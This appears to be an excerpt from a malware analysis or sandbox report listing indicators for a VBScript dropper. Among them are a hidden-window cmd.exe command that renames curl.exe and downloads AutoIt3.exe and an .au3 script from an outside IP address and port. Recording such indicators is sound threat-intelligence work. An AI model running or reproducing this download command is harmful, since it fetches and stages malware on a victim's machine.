Technical Information
- '<SYSTEM32>\wscript.exe' "C:\ysov\irrrcr.vbs"
- C:\ysov\irrrcr.vbs
- '5.##8.87.58':2351
- http://5.###.87.58:2351/fthgobnz via 5.##8.87.58
- '<SYSTEM32>\cmd.exe' /c mkdir c:\fthg & cd /d c:\fthg & copy <SYSTEM32>\curl.exe fthg.exe & fthg -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & fthg -o pimfuj.au3 http://5.188.87.58:2351/msifthgobn...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c mkdir c:\fthg & cd /d c:\fthg & copy <SYSTEM32>\curl.exe fthg.exe & fthg -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & fthg -o pimfuj.au3 http://5.188.87.58:2351/msifthgobn...